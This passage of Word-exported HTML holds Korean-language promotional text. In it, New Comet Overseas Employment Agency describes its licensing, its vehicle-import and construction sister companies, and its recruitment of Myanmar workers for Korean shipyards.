Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">로</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">영업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">시작하였습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">뉴코멧무역대행</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 2023</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">년</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">뉴코멧</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">외국인고용업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">면허를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">취득하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">서비스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">활동을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">시작하였습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">저희 <strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>해외직업소개회사</strong>&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"New Comet Overseas Employment Agency\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">는자매</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">회사인&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-spacerun:yes;\" xml:lang=\"KO\" lang=\"KO\"> </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>제야뉴코멧 자동차 판매 및 서비스 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>뉴코멧회사</strong>등</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기업들과</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">협력하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">경제통상자원부에서&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">차량</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">수입허가를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">신청했고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">각종</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">상용트럭</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">관광</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">산업 및</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">운송에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">사용되는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">다양한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">유형의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">버스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">및</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기계를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">일본에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">직접</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">구매 판매하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">사업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 25</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">년</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">이상&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">종사해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">왔고 나라를 위한 정한 세금들을 냈습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">. </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">게다가</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">100 </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">명 이상의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">직원에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">고용</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">제공했습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">또한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">쌍둥이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">회사인</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>뉴코멧건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>제야슈웨삐띡 건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>아웅네원 회사</strong>들은 정부</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">부처로부터</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">입찰&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">(tender)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">받고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">건설</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">작업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">동안</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 200</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">명</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">이상의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">직원에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">고용</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">제공했습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">저희&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>해외직업소개회사</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">는 현재에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">한국</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">조선소들에 일하고 싶은 미얀마</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">각지에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">온</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">소수민족</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">형제들을 교통통신부</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun 